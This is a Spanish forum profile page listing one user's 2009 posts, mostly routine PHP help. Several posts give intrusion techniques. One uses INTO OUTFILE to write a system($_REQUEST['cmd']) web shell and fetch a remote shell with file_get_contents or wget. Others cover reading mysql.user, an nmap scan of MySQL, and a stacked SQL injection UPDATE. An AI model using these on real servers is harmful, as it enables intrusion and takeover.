Citartambien existen algunos server sin consolaComo?
- Bienvenido a Test Foro de elhacker.net SMF 2.1.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#81
Nivel Web / Re: Un buen uso de INTO OUTFILE
8 Marzo 2009, 20:15 PM
#82
PHP / Re: error en el acceso a la propiedad
8 Marzo 2009, 19:32 PMCitarof the object you are trying to operate on was loaded _before_ unserialize()
Iniciaste la Clase?
new Class.. etc?
#83
PHP / Re: Ayuda Code PHP
8 Marzo 2009, 19:30 PM
jejeje pues creo que el compañero quiere contar caracteres y no Palabras.
con substr, tienes todo solucionado.
Saludos¡
con substr, tienes todo solucionado.
Saludos¡
#84
PHP / Re: Obtener el codigo fuente de otra web con php ???
8 Marzo 2009, 19:29 PM
La Forma msa Facil
Pero puede Ocupar, Curl, Fopen, socket_create.
Luego obtienes el codigo fuente y con regexp, vas obtiendo ue codigo que tu quieras¡
saludos¡
Código (php) [Seleccionar]
file_get_contents("url);Pero puede Ocupar, Curl, Fopen, socket_create.
Luego obtienes el codigo fuente y con regexp, vas obtiendo ue codigo que tu quieras¡
saludos¡
#85
PHP / Re: boton isset
8 Marzo 2009, 19:18 PMCita de: eLank0 en 8 Marzo 2009, 14:08 PM
Con $PHP_SELF te sale en la misma página si es lo que quieres...
S2
Cuidado Con PHP_SELF ¡¡¡¡
http://www.nbsp.es/2007/07/18/php_self-%C2%A1peligro-a-la-vista/
Mejor ¡
Código (php) [Seleccionar]
$_SERVER['SCRIPT_NAME'];EJEMPLO;
Código (html4strict) [Seleccionar]
<html>
<head>
<title>EJEMPLO</title>
</head>
<body>
<FORM ACTION="<? $_SERVER['SCRIPT_NAME']; ?>" METHOD="POST">
NOMBRE : <INPUT TYPE="text" NAME="nombre"><BR>
<INPUT TYPE="submit" VALUE="Enviar">
</FORM>
<?
$valor_nombre = htmlentities($_POST['nombre'],ENT_QUOTES);
if (isset($valor_nombre) && !empty($valor_nombre)){
echo $valor_nombre."<br>";
}else{
echo "SIN VALOR<br>";
}
?>
</body>
</html>
Espero que te Sirva¡
Saludos¡
#86
PHP / Re: boton isset
8 Marzo 2009, 08:29 AM
if (isset ($var) && !empty($var)){
procesamos...
}else{
errorr..
}
Isset: Verifica que Esta Definida.
!empty = verificamos que NO (!), este vacia.
Saludos¡
procesamos...
}else{
errorr..
}
Isset: Verifica que Esta Definida.
!empty = verificamos que NO (!), este vacia.
Saludos¡
#87
PHP / Re: Ayuda Code PHP
8 Marzo 2009, 08:22 AM
Perdon si Interprete Mal la Idea XD¡
Pero por lo que entendi.
No sale Mejor así?
y Si quieres Contar Palabra
http://cl2.php.net/manual/es/function.str-word-count.php
Saludos¡
Pero por lo que entendi.
No sale Mejor así?
Código [Seleccionar]
<?
$cadena = "Yo me Llamo Oz, y Tengo 2 Perros y 4 Gatos , Soy Chileno y Algun Dia GAnaremos el Mundial";
$Solo_50 = substr($cadena,0,50);
?>
y Si quieres Contar Palabra
http://cl2.php.net/manual/es/function.str-word-count.php
Saludos¡
#88
Nivel Web / Re: Un buen uso de INTO OUTFILE
6 Marzo 2009, 02:48 AM
hi brota¡
Into Outfile. siempre sirve. cuando tienes magic quotes off, privilegios en el usuario , y el document root, y una carpeta con permisos.
Con esas 4 cosas, tienes Ya Seguro el Ingreso a un Servidor.
Y en este Post:
http://foro.undersecurity.net/read.php?15,772
E Posteado varias Formas de Obtener Privilegios Mediante esta tecnica.
Por ej En el Source a Insertar. Ingresar.
Tambien Se Puede pasar a Hexa SQL para no tener dramas con las " "
En el Caso que no Tenga file_get_conetents, habilitado se puede hacer lo siguiente
y Luego con Wget
Asi Kedaria
Y Vuala ¡
Saludos¡
Into Outfile. siempre sirve. cuando tienes magic quotes off, privilegios en el usuario , y el document root, y una carpeta con permisos.
Con esas 4 cosas, tienes Ya Seguro el Ingreso a un Servidor.
Y en este Post:
http://foro.undersecurity.net/read.php?15,772
E Posteado varias Formas de Obtener Privilegios Mediante esta tecnica.
Por ej En el Source a Insertar. Ingresar.
Código [Seleccionar]
<? file_put_contents('shell.php',file_get_contents('http://www.ruta.com/shell.txt'));?>
Tambien Se Puede pasar a Hexa SQL para no tener dramas con las " "
En el Caso que no Tenga file_get_conetents, habilitado se puede hacer lo siguiente
Código [Seleccionar]
<? system($_REQUEST['cmd']); ?>
y Luego con Wget
Código [Seleccionar]
wget -c --output-document=shell.php www.script.com/shell.txt
Asi Kedaria
Código [Seleccionar]
http://www.pagina.com/file/c.php?cmd=wget -c --output-document=shell.php www.script.com/shell.txt
Y Vuala ¡
Saludos¡
#89
Nivel Web / Re: SQL injection.
27 Febrero 2009, 17:44 PM
el load file es con ''
load_file(''); o con hexsql.
Prueba ingresando a mysql.user, para luego volver a logearte en el phpmyadmin, asi tendras algun privilegio de algo. o remotamente por si tiene mysql remoto
nmap -sSV -P0 <ip> -p 3306
Saludos¡
load_file(''); o con hexsql.
Prueba ingresando a mysql.user, para luego volver a logearte en el phpmyadmin, asi tendras algun privilegio de algo. o remotamente por si tiene mysql remoto
nmap -sSV -P0 <ip> -p 3306
Saludos¡
#90
Nivel Web / Re: Inyeccion SQL (mysql) UPDATE dentro de un SELECT
27 Febrero 2009, 17:40 PMEjemplo de Como Seria.
MSSQL (Lo digo por el ; XD¡)
Código (sql) [Seleccionar]
SELECT email, passwd, login_id, full_name
FROM members
WHERE email = 'x';
UPDATE members
SET email = 'steve@unixwiz.net'
WHERE email = 'bob@example.com';http://www.unixwiz.net/techtips/sql-injection.html
Saludos¡